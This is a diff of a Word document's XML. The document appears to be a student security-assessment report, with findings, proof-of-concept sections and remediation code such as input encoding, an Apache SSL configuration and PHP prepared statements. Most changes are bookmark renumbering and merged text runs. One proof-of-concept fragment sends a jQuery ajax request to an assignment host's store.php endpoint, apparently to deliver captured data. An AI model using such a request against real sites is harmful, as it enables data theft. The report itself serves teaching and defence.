               <w:rPr>
                 <w:b/>
@@ -7042,7 +6848,7 @@
               </w:rPr>
             </w:pPr>
             <w:bookmarkStart w:id="14" w:name="_Proof_of_Concept_1"/>
-            <w:bookmarkStart w:id="15" w:name="_Toc71451201"/>
+            <w:bookmarkStart w:id="15" w:name="_Toc71453315"/>
             <w:bookmarkEnd w:id="14"/>
             <w:r>
               <w:rPr>
@@ -7270,7 +7076,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="16" w:name="_Toc71451202"/>
+            <w:bookmarkStart w:id="16" w:name="_Toc71453316"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7405,7 +7211,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="17" w:name="_Toc71451203"/>
+            <w:bookmarkStart w:id="17" w:name="_Toc71453317"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7514,7 +7320,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="18" w:name="_Toc71451204"/>
+            <w:bookmarkStart w:id="18" w:name="_Toc71453318"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7589,7 +7395,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="19" w:name="_Toc71451205"/>
+            <w:bookmarkStart w:id="19" w:name="_Toc71453319"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7672,7 +7478,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="20" w:name="_Toc71451206"/>
+            <w:bookmarkStart w:id="20" w:name="_Toc71453320"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7747,27 +7553,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">$question = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>htmlentities</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>($_POST["question"])</w:t>
+              <w:t>$question = htmlentities($_POST["question"])</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7797,7 +7583,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc71451207"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc71453321"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 3 - </w:t>
@@ -7847,7 +7633,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="22" w:name="_Toc71451208"/>
+            <w:bookmarkStart w:id="22" w:name="_Toc71453322"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8065,7 +7851,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="23" w:name="_Toc71451209"/>
+            <w:bookmarkStart w:id="23" w:name="_Toc71453323"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8152,7 +7938,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="24" w:name="_Toc71451210"/>
+            <w:bookmarkStart w:id="24" w:name="_Toc71453324"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8228,7 +8014,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="25" w:name="_Toc71451211"/>
+            <w:bookmarkStart w:id="25" w:name="_Toc71453325"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8334,7 +8120,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="26" w:name="_Toc71451212"/>
+            <w:bookmarkStart w:id="26" w:name="_Toc71453326"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8426,7 +8212,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="27" w:name="_Toc71451213"/>
+            <w:bookmarkStart w:id="27" w:name="_Toc71453327"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8557,7 +8343,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="28" w:name="_Toc71451214"/>
+            <w:bookmarkStart w:id="28" w:name="_Toc71453328"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8690,7 +8476,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="_Toc71451215"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc71453329"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -8746,7 +8532,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="30" w:name="_Toc71451216"/>
+            <w:bookmarkStart w:id="30" w:name="_Toc71453330"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8849,7 +8635,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="31" w:name="_Toc71451217"/>
+            <w:bookmarkStart w:id="31" w:name="_Toc71453331"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8887,9 +8673,9 @@
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="025D43FD" wp14:editId="29A9A212">
-                  <wp:extent cx="3940175" cy="1805940"/>
-                  <wp:effectExtent l="0" t="0" r="3175" b="3810"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="025D43FD" wp14:editId="140FEA2B">
+                  <wp:extent cx="5225066" cy="2394857"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
                   <wp:docPr id="11" name="Picture 11"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -8910,7 +8696,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3940175" cy="1805940"/>
+                            <a:ext cx="5275486" cy="2417967"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -8991,7 +8777,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="32" w:name="_Toc71451218"/>
+            <w:bookmarkStart w:id="32" w:name="_Toc71453332"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9143,7 +8929,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="33" w:name="_Toc71451219"/>
+            <w:bookmarkStart w:id="33" w:name="_Toc71453333"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9234,7 +9020,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="34" w:name="_Toc71451220"/>
+            <w:bookmarkStart w:id="34" w:name="_Toc71453334"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9322,7 +9108,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="35" w:name="_Toc71451221"/>
+            <w:bookmarkStart w:id="35" w:name="_Toc71453335"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9455,7 +9241,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="36" w:name="_Toc71451222"/>
+            <w:bookmarkStart w:id="36" w:name="_Toc71453336"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9557,7 +9343,6 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -9565,37 +9350,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>LoadModule</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ssl_module</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> modules/mod_ssl.so</w:t>
+              <w:t>LoadModule ssl_module modules/mod_ssl.so</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9642,6 +9397,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>Listen 443</w:t>
             </w:r>
           </w:p>
@@ -9670,27 +9426,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>VirtualHost</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> *:443&gt;</w:t>
+              <w:t>&lt;VirtualHost *:443&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9718,27 +9454,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ServerName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> www.example.com</w:t>
+              <w:t xml:space="preserve">    ServerName www.example.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9766,27 +9482,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>SSLEngine</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> on</w:t>
+              <w:t xml:space="preserve">    SSLEngine on</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9814,28 +9510,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>SSLCertificateFile</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> "/path/to/www.example.com.cert"</w:t>
+              <w:t xml:space="preserve">    SSLCertificateFile "/path/to/www.example.com.cert"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9863,27 +9538,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>SSLCertificateKeyFile</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> "/path/to/www.example.com.key"</w:t>
+              <w:t xml:space="preserve">    SSLCertificateKeyFile "/path/to/www.example.com.key"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9911,27 +9566,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>VirtualHost</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;/VirtualHost&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10027,7 +9662,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="37" w:name="_Toc71451223"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc71453337"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -10101,7 +9736,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="38" w:name="_Toc71451224"/>
+            <w:bookmarkStart w:id="38" w:name="_Toc71453338"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -10205,7 +9840,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="39" w:name="_Toc71451225"/>
+            <w:bookmarkStart w:id="39" w:name="_Toc71453339"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -10281,21 +9916,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">Note that the </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>apikey</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> needs to be replace</w:t>
+              <w:t>Note that the apikey needs to be replace</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10330,7 +9951,6 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="cm-variable"/>
@@ -10358,7 +9978,6 @@
               </w:rPr>
               <w:t>ajax</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -10406,67 +10025,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>"http://assignment-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>hermes.unimelb.life</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>api</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>store.php?name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>=%%"</w:t>
+              <w:t>"http://assignment-hermes.unimelb.life/api/store.php?name=%%"</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10570,7 +10129,6 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="cm-property"/>
@@ -10580,7 +10138,6 @@
               </w:rPr>
               <w:t>apikey</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -10640,17 +10197,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>}</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="message-body"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>).</w:t>
+              <w:t>}).</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10661,7 +10208,6 @@
               </w:rPr>
               <w:t>done</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -10834,7 +10380,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="40" w:name="_Toc71451226"/>
+            <w:bookmarkStart w:id="40" w:name="_Toc71453340"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -10930,7 +10476,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="41" w:name="_Toc71451227"/>
+            <w:bookmarkStart w:id="41" w:name="_Toc71453341"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -11011,7 +10557,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="42" w:name="_Toc71451228"/>
+            <w:bookmarkStart w:id="42" w:name="_Toc71453342"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -11109,7 +10655,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="43" w:name="_Toc71451229"/>
+            <w:bookmarkStart w:id="43" w:name="_Toc71453343"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -11178,7 +10724,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="44" w:name="_Toc71451230"/>
+            <w:bookmarkStart w:id="44" w:name="_Toc71453344"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -11271,43 +10817,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = $con-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>prepare(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"SELECT * FROM Users WHERE username = ?");</w:t>
+              <w:t>$stmt = $con-&gt;prepare("SELECT * FROM Users WHERE username = ?");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11335,61 +10845,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>bind_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>param</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"s", $_GET["username"]);</w:t>
+              <w:t>$stmt-&gt;bind_param("s", $_GET["username"]);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11417,43 +10873,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>execute(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;execute();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11481,43 +10901,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>close(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;close();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11535,7 +10919,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="45" w:name="_Appendix_I_-"/>
-      <w:bookmarkStart w:id="46" w:name="_Toc71451231"/>
+      <w:bookmarkStart w:id="46" w:name="_Toc71453345"/>
       <w:bookmarkEnd w:id="45"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -11605,7 +10989,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="47" w:name="_Toc71451232"/>
+      <w:bookmarkStart w:id="47" w:name="_Toc71453346"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Appendix 2 - Additional Information</w:t>
@@ -11627,7 +11011,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="48" w:name="_Section_1_–"/>
